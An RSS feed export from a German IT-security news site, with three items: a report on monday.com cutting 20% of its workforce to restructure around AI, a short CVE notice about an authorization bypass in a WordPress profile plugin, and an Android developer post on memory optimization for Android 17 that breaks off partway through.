<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=builder%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Thu, 30 Jul 2026 11:25:11 +0200</lastBuildDate>
<pubDate>Thu, 30 Jul 2026 11:25:11 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=builder%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=builder%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Monday.com cuts 20% of its workforce to restructure for the AI era]]></title>
<description><![CDATA[Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.



Monday.com co-founder and co-CEO Eran Zinman tod...]]></description>
<link>https://tsecurity.de/de/3694771/ai-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694771/ai-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:09 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.</p>



<p class="wp-block-paragraph">Monday.com co-founder and co-CEO Eran Zinman <a href="https://www.linkedin.com/pulse/building-mondaycom-its-next-chapter-eran-zinman-cxx4e/" target="_blank" rel="noreferrer noopener">today announced</a> the “very difficult decision” to reduce the AI work platform company’s global workforce by about 20%, or 620 people.</p>



<p class="wp-block-paragraph">The move has nothing to do with increasing margins or replacing humans with AI, he insisted in his post on LinkedIn; rather, it’s a calculated decision to trim down and hone the company’s focus as AI becomes integral to day-to-day workflows.</p>



<p class="wp-block-paragraph">“This is not a distress signal; it is a deliberate reset, disclosed with its price attached,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. “The industry has quietly swapped the meaning of productivity, and this filing is the clearest exhibit yet.”</p>



<h2 class="wp-block-heading">A ‘significant opportunity’ in technology</h2>



<p class="wp-block-paragraph">In a <a href="https://www.sec.gov/Archives/edgar/data/1845338/000117891326003553/zk2635715.htm" target="_blank" rel="noreferrer noopener">SEC filing</a> this week, monday.com said its restructuring plan reflects the “ongoing transformation of its product, marketing, and go-to-market strategy.” The move is intended to support a “leaner, more focused operating model” as the company continues to invest in its AI-driven strategy.</p>



<p class="wp-block-paragraph">Zinman noted in his post that the company has shifted to “doing the work with AI and not just managing it,” and is focused on building environments where “people and <a href="https://www.cio.com/article/411198/how-to-launch-your-ai-projects-from-pilot-to-production-and-ensure-success.html" target="_blank">AI agents</a> [work] together in one workspace.”</p>



<p class="wp-block-paragraph">In recent months, monday.com has <a href="https://www.computerworld.com/article/3822438/monday-com-aims-to-be-an-ai-first-platform-with-latest-enhancements.html" target="_blank">evolved its products</a>, strategy, and the way it serves its customers, and Zinman contended that “the organization we built for our previous chapter is not the organization that fits the new AI era.” Monday.com needs to “execute more decisively,” take on new challenges, and quickly respond to market changes, he said.</p>



<p class="wp-block-paragraph">“We have never seen such a significant opportunity in software, driven by such exciting technology,” Zinman noted. He emphasized that the reduction is not to replace people with AI, nor to improve margins; the “vast majority” of savings will be reinvested into talent, products, and AI.</p>



<p class="wp-block-paragraph">The restructuring will result in a “flatter organization” with fewer management layers and smaller, more autonomous teams, and monday.com also has a new go-to-market model, Zinman explained. Customers expect “deeper implementation support” as they deploy AI, and the company will work more closely with customers, increase its on-site presence, create new roles, and “adapt many existing ones.” In its SEC filing, the company said it expects to continue hiring in “key strategic areas” throughout 2026.</p>



<p class="wp-block-paragraph">Workers will be expected to work better, “not harder,” Zinman noted. He pointed to several past examples where work could have been done in a few days, but instead took many months with “multiple meetings and endless friction.”</p>



<p class="wp-block-paragraph">“This wasn’t people’s fault and everyone was frustrated by this,” he said. “Our new org changes ownership to allow people to make decisions and move fast.”</p>



<p class="wp-block-paragraph">A spokesperson for monday.com declined to comment further on the staff reductions.</p>



<h2 class="wp-block-heading">Monday.com’s key market advantages</h2>



<p class="wp-block-paragraph">Monday.com certainly isn’t struggling; the company expects 19% to 20% year-over-year growth in 2026.</p>



<p class="wp-block-paragraph">“Companies in that position do not restructure because they must,” Greyhound’s Gogia noted. “They restructure because they have decided to become something else.”</p>



<p class="wp-block-paragraph"><a href="https://moorinsightsstrategy.com/team/melody-brue/" target="_blank" rel="noreferrer noopener">Melody Brue</a>, VP and principal analyst at Moor Insights &amp; Strategy, pointed out that organizational redesign is important for real AI transformation, but while it can signal confidence to the market, it can still be “devastating” to humans.</p>



<p class="wp-block-paragraph">While the company looks as though it’s trying to do right, that ultimately remains to be seen, she said. “There are often hidden internal bruises that can surface long after layoffs.”</p>



<p class="wp-block-paragraph">Monday.com’s advantage is in its “structured substrate,” Gogia noted; its boards, permissions and typed workflows give agents something firmer to act on than just documents and chat history. The company highlights its natively built agents that can be configured by any team member, as well as connectors with Claude, Microsoft Copilot, and ChatGPT, and dedicated routes for external agents to authenticate and operate.</p>



<p class="wp-block-paragraph">“For some time, the sharper enterprise question has been shifting from who has an agent to who owns the governed runtime in which an agent can safely act,” he said. “Structured work is a serious claim on that runtime.”</p>



<p class="wp-block-paragraph">But parts of monday.com’s agent estate remain in staged release, and its product is ultimately “mid-transition,” Gogia pointed out; its agent builder carried a beta label as recently as March,. Also, the company’s pricing model changed in May to a hybrid model charging for seats as well as mandatory AI credits. And, while its AI-powered no-code builder monday vibe passed $1 million in annual recurring revenue within two and a half months, monday.com has not released subsequent outcomes, usage volumes, or attach rates.</p>



<p class="wp-block-paragraph">Further, there’s an element of “gravity” with its competitors, he observed. Asana is reorganizing teams around agents, Atlassian is wiring agents into the developer estate, and others are simply bundling them into their offerings: Microsoft is doing so across the productivity stack, and ServiceNow across enterprise operations, each with identity and procurement built in.</p>



<p class="wp-block-paragraph">“Their pull is strongest exactly where monday.com wants to grow, in the largest accounts, where control-plane depth and administrative reach decide the deal,” said Gogia.</p>



<h2 class="wp-block-heading">Actions for the near-term</h2>



<p class="wp-block-paragraph">Going forward, buyers should focus on operating risk, not headline risk, Moor’s Brue noted. In practice, that’s continuity of service, roadmap consistency, and strength of enterprise support. Productivity should be valued as better outcomes per unit of organizational effort, not mere activity.</p>



<p class="wp-block-paragraph">“It should be a measure of how much smoother, faster, and more effective the operating model becomes when AI is built into the work,” said Brue.</p>



<p class="wp-block-paragraph">Gogia noted that strain surfaces first in customer service, and monday.com’s attention is being redistributed. The company’s annual report disclosed that its focus is now concentrated on the largest accounts, with support for medium-sized clients moved to an AI-first and human-supported model.</p>



<p class="wp-block-paragraph">During the first month of the transition, buyers should track named account continuity and escalation times, he advised. By the first quarter, keep an eye on whether credit governance and admin controls mature on schedule, and if the roadmap beyond the AI estate keeps pace. By the half-year mark, determine whether promised implementation depth is producing outcomes or “simply more billable engagement.”</p>



<p class="wp-block-paragraph">Support tiers should be enumerated in writing before renewal, and <a href="https://www.cio.com/article/4192312/4-recs-for-cios-to-optimize-ai-budgets-and-improve-sustainability.html" target="_blank">buyers should contract</a> for “side exits,” Gogia emphasized, with overage pricing fixed in advance, the right to pause consumption, and portability for workflows and agent configuration “if the relationship sours.” Finance should also insist on monthly consumption reporting by capability. Further, integration efforts, partner dependency, and change management should be considered first-class costs of the agent era, “not as afterthoughts to a license.”</p>



<p class="wp-block-paragraph">“A license was a known cost,” said Gogia. “A meter is a behavior, and behavior is harder to forecast than headcount.”</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4200330/monday-com-cuts-20-of-its-workforce-to-restructure-for-the-ai-era.html" target="_blank">CIO.com</a>.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-3139 | cozmoslabs User Profile Builder Plugin up to 3.15.5 on WordPress wppb_save_avatar_value authorization]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in cozmoslabs User Profile Builder Plugin up to 3.15.5 on WordPress. This affects the function wppb_save_avatar_value. Performing a manipulation results in authorization bypass.

This vulnerability is identified as CVE-2026-3139. The attack can...]]></description>
<link>https://tsecurity.de/de/3693863/sicherheitsluecken/cve-2026-3139-cozmoslabs-user-profile-builder-plugin-up-to-3155-on-wordpress-wppbsaveavatarvalue-authorization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693863/sicherheitsluecken/cve-2026-3139-cozmoslabs-user-profile-builder-plugin-up-to-3155-on-wordpress-wppbsaveavatarvalue-authorization/</guid>
<pubDate>Sat, 25 Jul 2026 13:32:08 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/cozmoslabs:user_profile_builder_plugin">cozmoslabs User Profile Builder Plugin up to 3.15.5</a> on WordPress. This affects the function <code>wppb_save_avatar_value</code>. Performing a manipulation results in authorization bypass.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-3139">CVE-2026-3139</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Prioritizing Memory Efficiency: Essential Steps for Android 17]]></title>
<description><![CDATA[Posted by Alice Yuan, Developer Relations Engineer, Ajesh Pai, Developer Relations Engineer, and Fung Lam, Developer Relations Engineer



    
        
    



    While app performance is often equated with a smooth UI and fast start times, memory serves as the silent foundation upon which thes...]]></description>
<link>https://tsecurity.de/de/3693508/android-tipps/prioritizing-memory-efficiency-essential-steps-for-android-17/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693508/android-tipps/prioritizing-memory-efficiency-essential-steps-for-android-17/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:41 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCIAoJpwUITPS5C3_eTksMsaslwqPk7SIEQHkwEkGv8572ccdIKcdv6kNC1BOSJPAZTgX5m3liMMv4zdK58e5dWRhUfo39uas23LuhEWf13TFnDTdw-Z5mWn4JarSnC8yCET8Sw15zSF-jQ5zwALriacGK6IjAGxNg61sFtSxzndjvqXxZtJt4qxuzd9A/s2048/Engineering-Memory-Blog-Meta-3.png">

<div class="separator">
    <em>Posted by Alice Yuan, Developer Relations Engineer, Ajesh Pai, Developer Relations Engineer, and Fung Lam, Developer Relations Engineer</em>
</div>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhanYZz4QpaDuwP7y_ZVGCUh6TpdQxS65pBcYr-Qkawd9YFS587tnIUPnqDROlxIXzgdz6GGxluR3LzH8ZabQPWz382FDEOEDpK3GxUFywn0A54JXFtUwDPaeI0JnFhEl-6NRrcjKeFPMLozNQv_An9OcWEUA-rmXfOhWvIKRrptdblGEZHERD0P-ynFcc/s4209/Engineering-Memory-Blog-3.png">
        <img border="0" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhanYZz4QpaDuwP7y_ZVGCUh6TpdQxS65pBcYr-Qkawd9YFS587tnIUPnqDROlxIXzgdz6GGxluR3LzH8ZabQPWz382FDEOEDpK3GxUFywn0A54JXFtUwDPaeI0JnFhEl-6NRrcjKeFPMLozNQv_An9OcWEUA-rmXfOhWvIKRrptdblGEZHERD0P-ynFcc/s16000/Engineering-Memory-Blog-3.png">
    </a>
</div>

<p>
    While app performance is often equated with a smooth UI and fast start times, memory serves as the silent foundation upon which these visible metrics are built. It's no secret that we're seeing a shift where device memory is more important than ever. Not only have we made strides in Android memory optimizations with Android 17, we're providing the tooling and API support to help you stay ahead of stricter memory requirements later this year.
</p>

<p>
    To ensure device stability, starting in Android 17, the system will begin enforcing app memory limits based on the device's total RAM. If an app exceeds those limits, Android will kill the process with no associated stack trace.
</p>

<div>
    Beyond these forced terminations, unoptimized memory usage inevitably degrades the user experience. When the app approaches heap memory limits, it triggers frequent garbage collection—leading to noticeable UI stutters. Furthermore, when a device runs out of available memory, the system scrambles to reclaim pages, causing CPU strain, UI latency, and battery drain. If the memory shortage is too severe, it can cause Low Memory Killer (LMK) events that abruptly terminate background processes and force apps to have slow cold starts and lose user state.
</div>

<div>
    <p>To build highly performant apps and avoid these forced terminations, we recommend that you adopt the following memory optimization strategies:</p>
    <ol>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Maximize">Maximize bytecode optimization with R8</a></li>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Optimize">Optimize image loading</a></li>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Detect">Detect and fix memory leaks with Android Studio</a></li>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Trim">Trim memory when app leaves visible state</a></li>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Advanced">Advanced memory observability with ProfilingManager</a></li>
    </ol>
</div>
<br>
<div>
    <div class="separator">
        
    </div>
    <div>
        <em>A condensed version of this blog post is also available in video format, go check it out!</em>
    </div>
    
    <h3>Understanding Android 17 app memory limits</h3>
    <p>App memory limits are being introduced in Android 17 to prevent "one bad actor" from destroying the multitasking experience and stability of the user’s entire device.</p>
    <p>Here is a breakdown of the reasons driving this architectural change:</p>
    
    <div>
        <ul>
            <li><b>Preventing cascading kills:</b> When an app becomes bloated or leaks memory while holding a privileged state (e.g. it’s running a Foreground Service), it is initially shielded from the system's Low Memory Killer (LMK). As this single app grows unchecked and hoards RAM, the LMK is forced to compensate by killing off dozens of smaller, well-behaved cached apps and background jobs to reclaim space for the memory hog.</li>
            <li><b>Preserving multitasking and user state:</b> When the system is forced to purge cached apps to accommodate a single leaking process, the multitasking experience is severely degraded. Users returning to prior cached applications encounter sluggish cold starts instead of near-instant warm resumes. This inefficiency generates more CPU strain and accelerates battery depletion. It can also destroy the user’s context in recently used apps, such as scroll positions, navigation stacks, and in-game progress.</li>
        </ul>
        
        <div>
            <p>To determine if your app session was impacted by these constraints in the field, you can call <a href="https://developer.android.com/reference/android/app/ApplicationExitInfo#getDescription%28%29" target="_blank">getDescription()</a> within <a href="https://developer.android.com/reference/android/app/ApplicationExitInfo" target="_blank">ApplicationExitInfo</a>. If the system applied a limit, the exit reason is reported as <a href="https://developer.android.com/reference/android/app/ApplicationExitInfo#REASON_OTHER" target="_blank">REASON_OTHER</a> and the description string will contain "MemoryLimiter:AnonSwap". You can also leverage <a href="https://developer.android.com/topic/performance/tracing/profiling-manager/trigger-based-capture" target="_blank">trigger-based profiling</a> using <a href="https://developer.android.com/about/versions/17/features#anomaly-profiling-trigger" target="_blank">TRIGGER_TYPE_ANOMALY</a> to automatically capture heap dumps when the memory limit is reached. Furthermore, Android is actively working to surface more in-field memory metrics to developers within the Google Play Console.</p>
            <p>We have also expanded our <a href="https://developer.android.com/about/versions/17/behavior-changes-all#app-memory-limits" target="_blank">memory limits documentation</a> to include local debugging commands, allowing you to simulate memory constraints in your local environment and validate your application's behavior under any memory limit enforcement. </p>
        </div>
    </div>
</div>

<div>
    <h3>Maximize bytecode optimization with R8</h3>
    <p>A highly effective way to reduce your app's memory footprint is to enable the R8 optimizer. By shrinking classes, methods, and fields into shorter names and stripping out unused code and resources, R8 significantly reduces your app's memory footprint by minimizing the amount of resident code required during execution. </p>
    <p>R8 minimizes resident code, shrinking the memory footprint and lowering LMK termination risk. This results in more frequent warm starts over slow cold starts. Additionally, streamlined bytecode reduces main-thread CPU overhead, directly cutting ANR rates for a more fluid user experience. For example, the digital bank <a href="https://developer.android.com/blog/posts/monzo-boosts-performance-metrics-by-up-to-35-with-a-simple-r8-update" target="_blank">Monzo</a> enabled full R8 optimization and saw a 35% reduction in their ANR rate, a 30% improvement in cold start rate, and a 9% reduction in overall app size.</p>
</div>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB61hi7-o6RYAHNOoIg1egyi6iU3iGtLbwfOb-s6r_PadBV2LZzvYtcdD00iwcApjnqmwOssOLFSHv8MG_es8WJWaJUPaO6rMY4ZcINSBFROo_1Di3LVMvIEhPldpzQsUOxV1Z7VfPwvej2fa9a7yCNwBdGOGw2LMLtPrCST6InlqF1xHds30rS76C9no/s2500/pic1-IO26_113_TSV-monzo-casestudy.jpg">
        <img border="0" data-original-height="1406" data-original-width="2500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB61hi7-o6RYAHNOoIg1egyi6iU3iGtLbwfOb-s6r_PadBV2LZzvYtcdD00iwcApjnqmwOssOLFSHv8MG_es8WJWaJUPaO6rMY4ZcINSBFROo_1Di3LVMvIEhPldpzQsUOxV1Z7VfPwvej2fa9a7yCNwBdGOGw2LMLtPrCST6InlqF1xHds30rS76C9no/s16000/pic1-IO26_113_TSV-monzo-casestudy.jpg">
    </a>
</div>
<div>
    <i>The digital bank <a href="https://developer.android.com/blog/posts/monzo-boosts-performance-metrics-by-up-to-35-with-a-simple-r8-update" target="_blank">Monzo</a> enabled full R8 optimization and boosted performance metrics by up to 35%.</i>
</div>

<div>
    <p>To properly configure R8 in your <code>build.gradle</code> file:</p>
    <ul>
        <li>Set <code>isShrinkResources = true</code> and <code>isMinifyEnabled = true</code>.</li>
        <li>Use <code>proguard-android-optimize.txt</code> instead of the legacy <code>proguard-android.txt</code>, which actually prevents optimizations and is no longer supported in Android Gradle Plugin 9.</li>
        <li>Remove <code>android.enableR8.fullMode = false</code> from your <code>gradle.properties</code>.</li>
    </ul>
    
    <p>
        If you are using reflection in your code base, then add <a href="https://developer.android.com/topic/performance/app-optimization/keep-rules-overview#where-to-add-rules" target="_blank">Keep rules</a> to prevent R8 from optimizing those parts of the code. Make sure to scope the keep rules narrowly to get the maximum optimization.
    </p>
    <p>To get the maximum optimization, make sure to follow these best practices in your keep rule file.</p>
    
    <ul>
        <li>Remove global options like <code>-dontoptimize</code>, <code>-dontshrink</code>, and <code>-dontobfuscate</code> that prevent R8 from optimizing the entire codebase </li>
        <li>Remove keep rules that prevent optimizing Android components like Activity, Services, Views or Broadcast receivers.</li>
        <li>Refine the broad package wide keep rules to target only specific classes or methods.</li>
    </ul>
    
    <p>To see more best practices, view our <a href="https://developer.android.com/topic/performance/app-optimization/keep-rules-best-practices" target="_blank">keep rules documentation</a>.</p>
    
    <h3>Library Developer R8 Best Practices</h3>
    <p>If you are a library developer, strictly place the rules your consumers need into your <code>consumer-rules</code> file, and keep your library's internal protection rules in your <code>proguard-rules.pro</code> file. For more information on how to optimize libraries, see <a href="https://developer.android.com/topic/performance/app-optimization/library-optimization" target="_blank">Optimization for library authors</a>.</p>
    
    <h3>R8 Configuration Analyzer</h3>
    <p>To audit your R8 optimization, use the <b><a href="http://developer.android.com/r8-analyzer" target="_blank">Configuration Analyzer</a></b>. Configuration analyzer shows the current state of optimization with Obfuscation, Optimization, and Shrinking scores. With configuration analyzer, you can also understand how many classes, methods or fields are prevented from optimization by each keep rule. Refine these broad package wide keep rules to unlock the maximum optimization.</p>
    <p>Using configuration analyzer, you can also identify keep rules that are subsuming other keep rules, redundant keep rules and unused keep rules.</p>
</div>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib0dTmk8w7EYsDiV0Ufd8CAnpWz36-ZDC_gCGFkS_0CGz0axCxOy3RBxuaOoUbR4kzaeFBXryfSR2rkxRsmTXNrPtuJw8n1DTiZiKDqHjv3AaEXteE9TKV3QxYtwCztvY-8a0GpBlOZhVV1p0ftgdxeiKGGnO3dLu_IOt-TB_7j-ZnbR2jSr_CNYzh-bc/s2048/pic2-r8-config-analyzer.png">
        <img border="0" data-original-height="1156" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib0dTmk8w7EYsDiV0Ufd8CAnpWz36-ZDC_gCGFkS_0CGz0axCxOy3RBxuaOoUbR4kzaeFBXryfSR2rkxRsmTXNrPtuJw8n1DTiZiKDqHjv3AaEXteE9TKV3QxYtwCztvY-8a0GpBlOZhVV1p0ftgdxeiKGGnO3dLu_IOt-TB_7j-ZnbR2jSr_CNYzh-bc/s16000/pic2-r8-config-analyzer.png">
    </a>
</div>
<div>
    <i>The Configuration Analyzer shows the current state of optimization with Obfuscation, Optimization, and Shrinking scores.</i>
</div>

<div>
    <h4><span>R8 Agent Skill </span></h4>
    <p>You can also leverage the <b><a href="https://github.com/android/skills/tree/main/performance/r8-analyzer" target="_blank">R8 Agent Skill</a></b> with Android Studio agent or other AI tools to resolve misconfigurations and refine your rules resulting in improved app performance. <i>(Insights from AI-driven skills will require technical verification)</i></p>
</div>

<h3>Optimize image loading</h3>
<div>
    <p>Bitmaps are usually the largest common objects residing in your app's memory. They represent the final stage of the image loading process where compressed files, like JPEGs or PNGs, are decoded into raw pixel data for display. This means a tiny 100KB compressed image can balloon into several megabytes of RAM because memory consumption is determined by the image's pixel dimensions and color depth. Since bitmap operations are frequently on the critical path to drawing frames, unoptimized images cause severe memory bloat and UI jank.</p>
    <p>Google recommends leveraging image loading libraries <b><a href="https://github.com/coil-kt/coil" target="_blank">Coil</a></b> for Kotlin-first projects, particularly when developing with Jetpack Compose and <b><a href="https://github.com/bumptech/glide" target="_blank">Glide</a></b> for Java-based applications.</p>
    
    <h4><span>Adopt these five best practices</span></h4>
    <ol>
        <li><b>Downsample images:</b> If you’re loading bitmaps manually, avoid loading a massive image into a tiny thumbnail view; use <a href="https://developer.android.com/topic/performance/graphics/load-bitmap" target="_blank">inSampleSize</a> to load a smaller version. Glide and Coil downsamples images by default and you can configure this downsample strategy using <a href="https://bumptech.github.io/glide/javadocs/470/com/bumptech/glide/load/resource/bitmap/DownsampleStrategy.html" target="_blank">DownsampleStrategy</a> and <a href="https://coil-kt.github.io/coil/image_loaders/" target="_blank">ImageLoader</a> respectively.</li>
        <li><b>Cropping:</b> Avoid embedding padding directly into an image file for letterboxing purposes (e.g., creating a transparent border to expand an image dimensions). Rather than baking in these borders, utilize <a href="https://developer.android.com/reference/android/graphics/drawable/InsetDrawable" target="_blank">InsetDrawable</a> or apply padding directly within the View or Composable containing the bitmap.</li>
        <li><b>Config:</b> Balance memory and quality by choosing the right pixel format. Use <code>RGB_565</code> when transparency isn't needed, which uses half the memory of the default <code>ARGB_8888</code> format. In Glide you can configure this by using <a href="https://bumptech.github.io/glide/javadocs/470/com/bumptech/glide/load/DecodeFormat.html" target="_blank">DecodeFormat</a> and in Coil you can use <a href="https://coil-kt.github.io/coil/api/coil-core/coil3.request/-image-request/" target="_blank">bitmapConfig</a> property.</li>
        <li><b>Prioritize vector drawables:</b> For basic geometric assets, leverage <a href="https://developer.android.com/reference/android/graphics/drawable/ShapeDrawable" target="_blank">ShapeDrawable</a> as a lightweight alternative to decoding rasterized bitmaps. By defining these assets once via XML, you ensure they scale seamlessly across all display densities while effectively eliminating resource-driven memory bloat.</li>
        <li><b>Reuse:</b> If your application manages Bitmaps manually then to minimize memory churn, when a bitmap is no longer required, the app should call <code>bitmap.recycle()</code> and immediately discard the Bitmap reference. If you use an image loading library like Glide or Coil, return the bitmap to the library’s managed pool. By providing an existing buffer for future memory needs, the pool effectively avoids the overhead of new allocations.</li>
    </ol>
    
    <p>Check out our documentation on <a href="https://developer.android.com/develop/ui/compose/graphics/images/optimization" target="_blank">Optimizing performance for images</a> to learn more.</p>
    
    <h4><span>Android Studio tooling</span></h4>
    <p>You can also eliminate redundant bitmaps using Android Studio Narwhal 4. Here is how to hunt them down in five simple steps:</p>
    <ol>
        <li>Open the <b>Profiler</b> tab in Android Studio</li>
        <li>Click <b>Heap Dump</b> (or "Analyze Memory Usage") and hit record to take a snapshot of your app’s current memory state.</li>
        <li>Scan the analysis results for the <b>yellow warning triangle</b> ⚠️, which Android Studio uses to flag duplicate bitmaps being stored multiple times. Alternatively, navigate to the profiler header, choose "Filter by:" and pick the "Duplicate Bitmaps" setting.</li>
        <li>Click on any flagged entry to open the <b>Bitmap Preview</b> pane, allowing you to see exactly which image is the repeat offender.</li>
        <li>Use that visual confirmation to track down the redundant loading logic in your code and implement a better caching strategy.</li>
    </ol>
</div>

<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDJ6djtozFY7DzrGB-EN8ajLVueF9MdLd4mod4jhtO8YwCzU7ObOwQ2w0Bap5A5NHJ7KVnXIRQqhW8cTdcFhMJPw5FIW1WU7D_Mwm-UC9Fsdr-MOn62xijpjKcS0NeUBnO957jmogGEISNQgeZQk3BVvUWK4BknTjLiuK2TbWCqwO3uTLkjkFhLwJre7w/s2379/pic3-IO26_113_TSV%20-dup-bitmaps-cropped.jpg"><img border="0" data-original-height="1162" data-original-width="2379" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDJ6djtozFY7DzrGB-EN8ajLVueF9MdLd4mod4jhtO8YwCzU7ObOwQ2w0Bap5A5NHJ7KVnXIRQqhW8cTdcFhMJPw5FIW1WU7D_Mwm-UC9Fsdr-MOn62xijpjKcS0NeUBnO957jmogGEISNQgeZQk3BVvUWK4BknTjLiuK2TbWCqwO3uTLkjkFhLwJre7w/s16000/pic3-IO26_113_TSV%20-dup-bitmaps-cropped.jpg"></a></div><div class="separator"><i>Look for the yellow warning triangle ⚠️ in heap dumps when using the Android Studio Profiler.</i></div>

<h3>Detect and fix memory leaks with Android Studio</h3>
<p>Memory leaks in Android occur when your code holds onto an object's reference long after its lifecycle has ended. This prevents the Garbage Collector (GC) from reclaiming that memory, eventually leading to sluggish performance or OutOfMemoryError (OOM).</p>
<p>Android Studio Panda 3 features a dedicated <a href="https://square.github.io/leakcanary/" target="_blank">LeakCanary</a> profiler task, allowing developers to analyze real-time memory leaks and map traces within the IDE.</p>
<p>The LeakCanary profiler task in Android Studio actively moves the memory leak analysis from your device to your development machine, resulting in a significant performance boost during the leak analysis phase as compared to on-device leak analysis.</p>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKBixtkwy1hzwA6mikjRX_6vBJ9OQ_RCYdF94HUF8kOLYzQoQrPMLh_6h9u6EGeLzgFc8yjxg3_8zlqWIDCvKa1py5gyxDXasl8JLPDHSEgPpzPyYqzcme69rRKtfIlhMtyNRWXutGXNy-4WcefhSTBhqBgobK678fqvNqL5peOz1UD6ouunLaKPmJCw0/s2048/pic4-android-studio-leaks.png">
        <img border="0" data-original-height="975" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKBixtkwy1hzwA6mikjRX_6vBJ9OQ_RCYdF94HUF8kOLYzQoQrPMLh_6h9u6EGeLzgFc8yjxg3_8zlqWIDCvKa1py5gyxDXasl8JLPDHSEgPpzPyYqzcme69rRKtfIlhMtyNRWXutGXNy-4WcefhSTBhqBgobK678fqvNqL5peOz1UD6ouunLaKPmJCw0/s16000/pic4-android-studio-leaks.png">
    </a>
</div>
<div>
    <i>LeakCanary memory leak analysis contextualized with <b>Go to declaration</b> for debugging</i>
</div>

<p>Additionally, the leak analysis is now contextualized within the IDE and fully integrated with your source code, providing features like go to declaration and other helpful code connections that drastically reduce the friction and time required to investigate and fix memory leaks.</p>

<div>
    <h4><span>Examples of common memory leaks </span></h4>
    <p>Memory leaks occur when an object persists in memory beyond its intended lifespan. This typically happens due to:</p>
    <ul>
        <li>Retaining references to Fragments, Activities, or Views that are no longer in use.</li>
        <li>Mismanaging Context references.</li>
        <li>Failing to properly unregister observers, listeners, and receivers.</li>
        <li>Creating static references to objects that are bound to components with shorter lifecycles.</li>
    </ul>
    
    <p>Here are a few example scenarios:</p>
    
    <div align="left" dir="ltr">
        <table>
            <colgroup>
                <col>
                <col>
                <col>
            </colgroup>
            <tbody>
                <tr>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Scenario</span></p>
                    </td>
                    <td>
